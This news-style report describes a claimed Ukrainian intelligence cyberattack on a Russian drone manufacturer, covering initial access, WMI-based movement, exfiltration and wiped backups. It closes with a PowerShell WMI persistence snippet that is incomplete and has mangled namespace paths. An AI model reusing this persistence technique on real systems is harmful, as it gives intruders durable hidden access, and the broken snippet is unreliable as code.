In the previous week, Ukraine’s Principal Intelligence Directorate (GUR) carried out an advanced cyber assault against Gaskar Integration, a prominent manufacturer of drones in Russia.
The initiative commenced with the examination of the company’s publicly accessible infrastructure, where malicious actors pinpointed susceptible remote desktop services and obsolete VPN gateways.
By exploiting a zero-day vulnerability in a third-party web application firewall, the intruders secured an initial foothold within the corporate network. Once they gained access, they deployed custom malware that took advantage of Windows Management Instrumentation (WMI) to facilitate lateral movement and extract credentials.
Hromadske analysts observed that the harmful payload encompassed a dual-stage loader crafted in C++ and PowerShell.
The initial stage established persistence through a malicious WMI subscription, whereas the latter stage decrypted a reverse-shell implant in memory.
Communications were tunneled over TLS using forged certificates that simulated the company’s own public key infrastructure.
The malware’s command-and-control (C2) framework was hosted on compromised industrial control system servers, complicating attribution and mitigation efforts.
By the time defenders identified unusual network traffic, the attackers had exfiltrated over 47 TB of technical data, including drone design blueprints, production records, and employee files.
All backup copies on the victim’s servers were permanently eradicated, severely hampering Gaskar’s manufacturing and accounting functions.
Personnel were barred from accessing production software and physical access systems, with only fire escapes remaining operational.
Hromadske researchers discerned essential modules of the implant by reverse-engineering its unpacker.
Infection Mechanism
The malware’s infection method hinged on the exploitation of a WAF bypass. Following access, the attackers uploaded a diminutive dropper—less than 15 KB—that executed a Base64-encoded PowerShell one-liner.
This script connected to a hard-coded C2 domain, downloaded an encrypted payload, and executed it entirely in memory to evade disk-based detection.
The persistent WMI event filter was formulated as follows:-
$filter = Set-WmiInstance -Namespace rootsubscription -Class __EventFilter `
-Arguments @{
Name = "SysUpdateFilter"
EventNameSpace = "rootcimv2"
QueryLanguage = "WQL"
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'"
}
Set-WmiInstance -Namespace rootsubscription -Class __FilterToConsumerBinding `
-Arguments @{
Filter = $filter
Consumer = $consumer
}This guarantees execution at every system clock tick, providing the implant with high survivability even post-reboot.